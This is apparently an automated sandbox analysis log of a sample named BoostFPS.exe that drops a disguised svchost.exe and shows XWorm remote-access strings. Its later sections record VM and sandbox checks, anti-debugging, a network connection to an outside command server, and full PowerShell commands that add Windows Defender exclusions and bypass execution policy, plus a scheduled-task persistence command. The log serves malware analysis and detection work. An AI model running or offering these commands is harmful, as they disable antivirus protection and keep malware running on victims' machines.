                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Check if machine is in data center or colocation facility
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: BoostFPS.exe, 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL?D13JRXWBGEAAD3U7QWDS0OOYDM8W0XB?SAZ1G0CN6L1C0ROTYF1S05WCJYEA3HF
                  Source: C:\Users\user\Desktop\BoostFPS.exeMemory allocated: 610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeMemory allocated: 1A4E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A5A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1290000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ACB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 31A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2600000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A600000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\BoostFPS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 4062Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 5767Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6100Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3569Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6430Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3137Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7244
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2322
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6280
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3270
                  Source: C:\Users\user\Desktop\BoostFPS.exe TID: 2520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 6624Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 6430 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5476Thread sleep count: 3137 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep count: 7244 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep count: 2322 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep count: 6280 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep count: 3270 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5492Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5028Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2724Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\BoostFPS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: svchost.exe, 00000004.00000002.3321389821.000000001C600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf7f11d
                  Source: svchost.exe.0.drBinary or memory string: vmware
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_00007FF848DA7A81 CheckRemoteDebuggerPresent,4_2_00007FF848DA7A81
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\BoostFPS.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.27.248 7777Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "Jump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 100,25Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                  Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                  Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                  Source: C:\Users\user\Desktop\BoostFPS.exeQueries volume information: C:\Users\user\Desktop\BoostFPS.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
